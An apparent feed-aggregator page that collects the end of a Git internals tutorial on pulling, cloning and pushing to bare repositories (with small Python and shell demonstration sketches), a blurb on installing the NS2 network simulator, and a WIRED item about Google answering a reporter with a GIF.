    The user merges FETCH_HEAD. FETCH_HEAD is just another ref. It resolves to the 14 commit, the giver. HEAD points at the 13 commit, the receiver. Git does a fast-forward merge and points master at the 14 commit.

    alpha after FETCH_HEAD merged

    Pull a branch from a remote

    ~/alpha $ git pull bravo master
              Already up-to-date.
    

    The user pulls master from bravo into alpha. Pull is shorthand for “fetch and merge FETCH_HEAD”. Git does these two commands and reports that master is Already up-to-date.

    Clone a repository

    ~/alpha $ cd ..
          ~ $ git clone alpha charlie
              Cloning into 'charlie'
    

    The user moves into the directory above. They clone alpha to charlie. Cloning to charlie has similar results to the cp the user did to produce the bravo repository. Git creates a new directory called charlie. It inits charlie as a Git repo, adds alpha as a remote called origin, fetches origin and merges FETCH_HEAD.

    Push a branch to a checked-out branch on a remote

          ~ $ cd alpha
    ~/alpha $ printf '15' > data/number.txt
    ~/alpha $ git add data/number.txt
    ~/alpha $ git commit -m '15'
              [master 8b35db5] 15
    

    The user goes back into the alpha repository. They set the content of data/number.txt to 15 and commit the change to master on alpha.

    ~/alpha $ git remote add charlie ../charlie
    

    They set up charlie as a remote repository on alpha.

    ~/alpha $ git push charlie master
              Writing objects: 100%
              remote error: refusing to update checked out
              branch: refs/heads/master because it will make
              the index and work tree inconsistent
    

    They push master to charlie.

    All the objects required for the 15 commit are copied to charlie.

    At this point, the push process stops. Git, as ever, tells the user what went wrong. It refuses to push to a branch that is checked out on the remote. This makes sense. A push would update the remote index and HEAD. This would cause confusion if someone were editing the working copy on the remote.
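
The refusal can be expressed as a small check on the remote's HEAD. This sketch models Git's default behaviour only. can_push is a made-up function, and the receive.denyCurrentBranch setting on the remote can change what Git really does.

```python
def can_push(remote_is_bare: bool, remote_head: str, branch: str) -> bool:
    """Model the check described above.

    `remote_head` is the content of the remote repository's HEAD file.
    """
    checked_out = remote_head.strip() == f"ref: refs/heads/{branch}"
    # A bare repository has no working copy, so nothing can become inconsistent.
    return remote_is_bare or not checked_out
```

For charlie, HEAD reads ref: refs/heads/master and the repository is not bare, so a push to master is refused. A push to a branch that is not checked out would be accepted.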

    At this point, the user could make a new branch, merge the 15 commit into it and push that branch to charlie. But, really, they want a repository that they can push to whenever they want. They want a central repository that they can push to and pull from, but that no one commits to directly. They want something like a GitHub remote. They want a bare repository.

    Clone a bare repository

    ~/alpha $ cd ..
          ~ $ git clone alpha delta --bare
              Cloning into bare repository 'delta'
    

    The user moves into the directory above. They clone alpha to delta as a bare repository. This is an ordinary clone with two differences. The config file indicates that the repository is bare. And the files that are normally stored in the .git directory are stored in the root of the repository:

    delta
    ├── HEAD
    ├── config
    ├── objects
    └── refs
    
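
    Both differences can be checked from the command line. This is a small sketch against a throwaway alpha in a temporary directory; the repository contents and the `demo` identity are assumptions.

```shell
set -e
work=$(mktemp -d)
cd "$work"

# Throwaway alpha with a single commit.
git init -q alpha
cd alpha
git symbolic-ref HEAD refs/heads/master
printf '15' > number.txt
git add number.txt
git -c user.name=demo -c user.email=demo@example.com commit -q -m '15'
cd ..

git clone -q --bare alpha delta

# Difference 1: the config file marks the repository as bare.
bare_flag=$(git -C delta config core.bare)
is_bare=$(git -C delta rev-parse --is-bare-repository)
echo "core.bare = $bare_flag"

# Difference 2: HEAD, config, objects and refs sit in the root, with no .git directory.
ls delta
```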

    alpha and delta graphs after alpha cloned to delta

    Push a branch to a bare repository

          ~ $ cd alpha
    ~/alpha $ git remote add delta ../delta
    

    The user goes back into the alpha repository. They set up delta as a remote repository on alpha.

    ~/alpha $ printf '16' > data/number.txt
    ~/alpha $ git add data/number.txt
    ~/alpha $ git commit -m '16'
              [master 02d1bb2] 16
    

    They set the content of data/number.txt to 16 and commit the change to master on alpha.

    16 commit on alpha

    ~/alpha $ git push delta master
              Writing objects: 100%
              To ../delta
                8b35db5..02d1bb2 master -> master
    

    They push master to delta. Pushing has three steps.

    First, all the objects required for the 16 commit on the master branch are copied from alpha/.git/objects/ to delta/objects/. (delta is bare, so it has no .git directory.)

    Second, delta/refs/heads/master is updated to point at the 16 commit.

    Third, alpha/.git/refs/remotes/delta/master is set to point at the 16 commit. This means alpha has an up-to-date record of the state of delta.
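
    The outcome of the three steps can be verified after a push. The sketch below rebuilds the alpha and delta setup in a temporary directory (contents and the `demo` identity are assumptions) and compares the refs on both sides.

```shell
set -e
work=$(mktemp -d)
cd "$work"

# Throwaway alpha, bare clone delta, and delta registered as a remote.
git init -q alpha
cd alpha
git symbolic-ref HEAD refs/heads/master
printf '15' > number.txt
git add number.txt
git -c user.name=demo -c user.email=demo@example.com commit -q -m '15'
cd ..
git clone -q --bare alpha delta
cd alpha
git remote add delta ../delta

# Make the 16 commit and push it.
printf '16' > number.txt
git -c user.name=demo -c user.email=demo@example.com commit -q -a -m '16'
git push -q delta master

local_master=$(git rev-parse refs/heads/master)

# Step 1: the commit object now exists in delta's object store.
git --git-dir=../delta cat-file -e "$local_master"

# Step 2: delta's master points at the 16 commit.
remote_master=$(git --git-dir=../delta rev-parse refs/heads/master)

# Step 3: alpha's record of delta's master points there too.
tracking=$(git rev-parse refs/remotes/delta/master)

echo "alpha master:        $local_master"
echo "delta master:        $remote_master"
echo "alpha's delta/master: $tracking"
```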

    16 commit pushed from alpha to delta

    Summary

    Git is built on a graph. Almost every Git command manipulates this graph. To understand Git deeply, focus on the properties of this graph, not workflows or commands.

    To learn more about Git, investigate the .git directory. It’s not scary. Look inside. Change the content of files and see what happens. Create a commit by hand. Try and see how badly you can mess up a repo. Then repair it.
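
    One way to create a commit by hand is with Git's plumbing commands, which write the blob, tree and commit objects one at a time. This is a sketch in a throwaway repository; the repository name `handmade`, the file name, the `17` content and the `demo` identity are all hypothetical.

```shell
set -e
work=$(mktemp -d)
cd "$work"
git init -q handmade            # hypothetical repository name
cd handmade
git symbolic-ref HEAD refs/heads/master

# Write the file content into the object store as a blob.
blob=$(printf '17' | git hash-object -w --stdin)

# Stage the blob under a path, then write the index out as a tree object.
git update-index --add --cacheinfo 100644 "$blob" number.txt
tree=$(git write-tree)

# Create a commit object that points at the tree (no parent: a root commit).
commit=$(git -c user.name=demo -c user.email=demo@example.com \
  commit-tree "$tree" -m 'by hand')

# Point master at the new commit.
git update-ref refs/heads/master "$commit"

# Show the raw commit object: tree, author, committer, message.
git cat-file -p "$commit"
```

    After this, the files under .git/objects and .git/refs/heads/master can be inspected to see exactly what each command wrote.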


    Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/puHtvtexnHI/git-from-the-inside-out

    Original article

    Installing Network Simulator 2 (NS2) on Ubuntu 14.04

    Network simulators are tools that simulate discrete events in a network and help to predict the behaviour of a computer network. Generally, the simulated networks have entities like links, switches, hubs, applications, etc. Once the simulation model is complete, it is executed to analyse the performance. Administrators can then customize the simulator to suit their needs. Network simulators typically come with support for the most popular protocols and networks in use today, such as WLAN, UDP, TCP, IP, WAN, etc.


    Original URL: https://www.howtoforge.com/tutorial/ns2-network-simulator-on-ubuntu-14.04/

    Original article

    Google sends reporter a GIF instead of a ‘no comment’

    Not to be all snooty about online publishing, but your newspaper can’t do this:

    This adorable animated GIF is apparently the official answer Google sent to a Daily Dot reporter in response to his seeming scoop on a new YouTube livestreaming plan. Richard Lewis reported that Google-owned YouTube was going to take a new swing at “eSports”—a.k.a. watching other people play videogames—as services like Amazon’s Twitch gain popularity.

    In an update to the story today (h/t Business Insider), Lewis wrote that a YouTube spokesperson sent him an animated GIF in response to a request for comment. He assumed it was a joke. “Earlier today, the rep assured us it was not,” Lewis said.

    “‘The GIF really was our official response,’” Lewis quotes the rep as saying.

    On the one hand, it’s fair to look back on the print-first news organizations of the 20th century and criticize them for not moving fast enough as the efficiency and reach of online publishing became apparent. On the other hand, you can’t really blame anyone twenty years ago for not anticipating that the PR shop of one of the world’s most valuable publicly traded companies would send out cute moving pictures of kids as an official response to anything.

    WIRED reached out to Google to confirm that the GIF came from them, but the company has yet to respond. If it does, I hope the reply looks something like this:

    Update (March 25, 2015, 8:30 p.m. ET): Just received this tweet from YouTube head of communications Chris Dale:

    And here’s the GIF:


    Original URL: http://feedproxy.google.com/~r/feedsapi/BwPx/~3/5Xdh_gPbWFY/

    Original article
